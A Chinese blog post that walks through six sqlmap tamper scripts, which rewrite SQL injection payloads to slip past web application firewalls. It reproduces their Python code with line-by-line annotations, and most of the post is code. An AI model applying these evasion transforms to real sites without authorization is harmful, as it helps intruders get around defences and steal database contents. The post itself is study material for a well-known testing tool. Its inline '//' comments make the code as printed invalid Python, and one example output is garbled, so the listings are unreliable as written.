sqlmap中的tamper 脚本分析

最新推荐文章于 2024-05-22 11:02:40 发布

小杨想睡觉.

最新推荐文章于 2024-05-22 11:02:40 发布

阅读量428

点赞数

文章标签： web安全

本文链接：https://blog.csdn.net/weixin_62420492/article/details/122274121

版权

space2randomblank

作用：空格替换为备选字符集中的随机字符
例子：

('select id from users')
( select %0Did%0DFRM%0A users')

详细注释：

#!/usr/bin/env python//此处用法为：程序到env设置里查找python的安装路径，再调用对应路径下的解释器程序完成操作

"""  //python 的多行注释符
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import random

from lib.core.compat import xrange //导入sqlmap中的lib/core/compat中的xrange函数
from lib.core.enums import PRIORITY//导入sqlmap中lib/core/enums 中的PRIORITY函数

__priority__ = PRIORITY.LOW//定义优先级，此处级别为一般

def dependencies():  //定义dependencies() ，此处是为了和整体脚本的结构保持一致
    pass  //不做任何事情，一般用做站位语句，为了保证程序的完整性

def tamper(payload, **kwargs)://定义tamper  脚本，payload, **kwargs为定义的参数
    """  //多行注释符
    Replaces space character (' ') with a random blank character from a valid set of alternate characters  //此处为tamper说明，以便使用该脚本

    Tested against:  //用于多种数据库，并且作用与弱防护效果的防火墙
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass several web application firewalls

    >>> random.seed(0)
    >>> tamper('SELECT id FROM users')
    'SELECT%0Did%0CFROM%0Ausers'
    """

    # ASCII table:
    #   TAB     09      horizontal TAB
    #   LF      0A      new line
    #   FF      0C      new page
    #   CR      0D      carriage return
    blanks = ("%09", "%0A", "%0C", "%0D")
    retVal = payload

    if payload: //判断payload
        retVal = "" //将retVal 赋值为空语句
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload))://xrange为一个生成器
            if not firstspace:
                if payload[i].isspace()://检测字符串是否只由空格组成
                    firstspace = True//将true 赋给firstspace
                    retVal += random.choice(blanks)//返回一个列表，元组或字符串的随机项
                    continue//跳出本次循环

            elif payload[i] == '\''://判断字符是否为'\'
                quote = not quote

            elif payload[i] == '"'://判断字符是否为"
                doublequote = not doublequote

            elif payload[i] == ' ' and not doublequote and not quote:
                retVal += random.choice(blanks)//返回一个列表，元组或字符串的随机项
                continue//跳出本次循环

            retVal += payload[i]

    return retVal//返回随机字符

symboliclogical

作用：AND和OR替换为&&和||

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOWEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)

    >>> tamper("1 AND '1'='1")
    "1 %26%26 '1'='1"
    """

    retVal = payload//将payload赋值给retVal

    if payload:
        retVal = re.sub(r"(?i)\bAND\b", "%26%26", re.sub(r"(?i)\bOR\b", "%7C%7C", payload))//判断是否为AND和OR，将其替换为&&和||

    return retVal

uppercase

作用：全部替换为大写值

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.data import kb
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces each keyword character with upper case value (e.g. select -> SELECT)

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions
        * This tamper script should work against all (?) databases

    >>> tamper('insert')
    'INSERT'
    """

    retVal = payload

    if payload:
        for match in re.finditer(r"[A-Za-z_]+", retVal)://对retVal payload 进行大写查找
            word = match.group()//将查找内容赋值给word

            if word.upper() in kb.keywords://如果在攻击载荷中有小写字母
                retVal = retVal.replace(word, word.upper())//将小写字母转化成大写字母

    return retVal//返回大写字母

informationschemacomment

作用：标识符后添加注释

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def tamper(payload, **kwargs):
    """
    Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier

    >>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')
    'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'
    """

    retVal = payload

    if payload://判断payload
        retVal = re.sub(r"(?i)(information_schema)\.", r"\g<1>/**/.", payload)//赋值遇见information_schema  

    return retVal//返回

least

作用：替换大于号为least

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces greater than operator ('>') with 'LEAST' counterpart

    Tested against:
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls that
          filter the greater than character
        * The LEAST clause is a widespread SQL command. Hence, this
          tamper script should work against majority of databases

    >>> tamper('1 AND A > B')
    '1 AND LEAST(A,B+1)=B+1'
    """

    retVal = payload

    if payload:
        match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)//re.search扫描整个字符串并返回第一个成功的匹配  \w 等价于'[A-Za-z0-9_]'

        if match:
            _ = "%sLEAST(%s,%s+1)=%s+1" % (match.group(1), match.group(3), match.group(4), match.group(4))//返回match 的一个或多个子组
            retVal = retVal.replace(match.group(0), _)//将旧字符串替换成新的字符串

    return retVal//返回retVal

```php

lowercase

作用：将大写字母转化成小写字母

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.data import kb
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces each keyword character with lower case value (e.g. SELECT -> select)

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass very weak and bespoke web application firewalls
          that has poorly written permissive regular expressions

    >>> tamper('INSERT')
    'insert'
    """

    retVal = payload //将payload赋值给retVal,以便中间转换

    if payload://进行判断payload
        for match in re.finditer(r"\b[A-Za-z_]+\b", retVal)://对retVal payload 进行小写查找
            word = match.group()//将查找到的字母赋值给word

            if word.upper() in kb.keywords://如果再攻击载荷中有大写字母
                retVal = retVal.replace(word, word.lower())//将大写字母转化为小写字母

    return retVal//返回小写字母

小杨想睡觉.

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
sqlmap中的tamper 脚本分析

space2randomblank作用：空格替换为备选字符集中的随机字符例子：('select id from users')( select %0Did%0DFRM%0A users')详细注释：#!/usr/bin/env python//此处用法为：程序到env设置里查找python的安装路径，再调用对应路径下的解释器程序完成操作""" //python 的多行注释符Copyright (c) 2006-2021 sqlmap developers (https://sqlmap
复制链接

扫一扫